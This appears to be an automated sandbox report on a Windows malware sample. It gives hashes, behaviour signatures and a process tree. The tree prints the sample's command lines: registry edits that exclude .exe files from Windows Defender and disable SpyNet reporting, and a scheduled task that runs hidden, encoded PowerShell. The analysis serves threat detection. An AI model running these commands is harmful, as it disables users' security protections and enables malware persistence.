Analysis
-
max time kernel
13s -
max time network
10s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
30/08/2023, 00:47
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230824-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20230703-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
b9674d1bde76f639e61b00068a2c64e2
-
SHA1
98743bcfa8791edd6faf435b369afb966ee75f12
-
SHA256
94554e1b98b18ba4acb922c60cc15599f2d26e3f5e26f2a33e50b63d72c5003e
-
SHA512
ce66d00bd303027b56f74ea3e55ffd3077eaeed67a0fbd34185b94adc6a7ad6c8170dd7a06f29492d5248009a22445370fbc297ef2d29f488fd566e8c2f4e2bd
-
SSDEEP
196608:91OfcZO8H33MCSywKD3ch1RrR2A+BpFBBeoADG8zk:3OQHMlNKDMxcAkFlADG84
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 5044 Install.exe 1420 Install.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3556 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 212 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 212 powershell.EXE -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 708 wrote to memory of 5044 708 file.exe 80 PID 708 wrote to memory of 5044 708 file.exe 80 PID 708 wrote to memory of 5044 708 file.exe 80 PID 5044 wrote to memory of 1420 5044 Install.exe 82 PID 5044 wrote to memory of 1420 5044 Install.exe 82 PID 5044 wrote to memory of 1420 5044 Install.exe 82 PID 1420 wrote to memory of 524 1420 Install.exe 87 PID 1420 wrote to memory of 524 1420 Install.exe 87 PID 1420 wrote to memory of 524 1420 Install.exe 87 PID 1420 wrote to memory of 1288 1420 Install.exe 89 PID 1420 wrote to memory of 1288 1420 Install.exe 89 PID 1420 wrote to memory of 1288 1420 Install.exe 89 PID 1288 wrote to memory of 4120 1288 forfiles.exe 92 PID 1288 wrote to memory of 4120 1288 forfiles.exe 92 PID 1288 wrote to memory of 4120 1288 forfiles.exe 92 PID 524 wrote to memory of 4928 524 forfiles.exe 91 PID 524 wrote to memory of 4928 524 forfiles.exe 91 PID 524 wrote to memory of 4928 524 forfiles.exe 91 PID 4120 wrote to memory of 2140 4120 cmd.exe 94 PID 4928 wrote to memory of 3020 4928 cmd.exe 93 PID 4120 wrote to memory of 2140 4120 cmd.exe 94 PID 4120 wrote to memory of 2140 4120 cmd.exe 94 PID 4928 wrote to memory of 3020 4928 cmd.exe 93 PID 4928 wrote to memory of 3020 4928 cmd.exe 93 PID 4120 wrote to memory of 2516 4120 cmd.exe 95 PID 4120 wrote to memory of 2516 4120 cmd.exe 95 PID 4120 wrote to memory of 2516 4120 cmd.exe 95 PID 4928 wrote to memory of 4704 4928 cmd.exe 96 PID 4928 wrote to memory of 4704 4928 cmd.exe 96 PID 4928 wrote to memory of 4704 4928 cmd.exe 96 PID 1420 wrote to memory of 3556 1420 Install.exe 98 PID 1420 wrote to memory of 3556 1420 Install.exe 98 PID 1420 wrote to memory of 3556 1420 Install.exe 98 PID 1420 wrote to memory of 220 1420 Install.exe 100 PID 1420 wrote to memory of 220 1420 Install.exe 100 PID 1420 wrote to memory of 220 1420 Install.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:708 -
C:\Users\Admin\AppData\Local\Temp\7zS8C61.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Users\Admin\AppData\Local\Temp\7zS9366.tmp\Install.exe.\Install.exe /QRfsdidCyDv "525403" /S3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4928 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:3020
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4704
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4120 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2140
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2516
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gLXFCeQsE" /SC once /ST 00:17:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:3556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gLXFCeQsE"4⤵PID:220
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:212
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.2MB
MD5cdcab15323430f35e4cb8b71ebe4ba5c
SHA195af4ad030c52757928d452dd8752ef147cd3e96
SHA256aba7d7fbfddd990757921c232546c2052b082d243c6ed4c68bf743ee87ae1ee4
SHA512508f8a3bac69eeada7761a708d24dc84a4e0d96306db4f6eaed769f0af1e2de634da10768707c679830833d690ebb601962b2df98921330a87b1b7d17616e5d4
-
Filesize
6.2MB
MD5cdcab15323430f35e4cb8b71ebe4ba5c
SHA195af4ad030c52757928d452dd8752ef147cd3e96
SHA256aba7d7fbfddd990757921c232546c2052b082d243c6ed4c68bf743ee87ae1ee4
SHA512508f8a3bac69eeada7761a708d24dc84a4e0d96306db4f6eaed769f0af1e2de634da10768707c679830833d690ebb601962b2df98921330a87b1b7d17616e5d4
-
Filesize
6.8MB
MD5641acaddbad9798c346b799f85f3a85e
SHA1a8f45092bde5d6ce89aed465dc909553341a631e
SHA256089522920f7a9bad3970f88a86789545e7e1fe3a9aba309850b2f18270968928
SHA512b7c79a4bbc0d5509ed2a843a920e68257fc22b4fa311145668e048cfbd22f5e238d5cd4e1eec2a1d1bd4a5497e8ad746f09f5b615fc3468bfaba9f9b5d26bc47
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82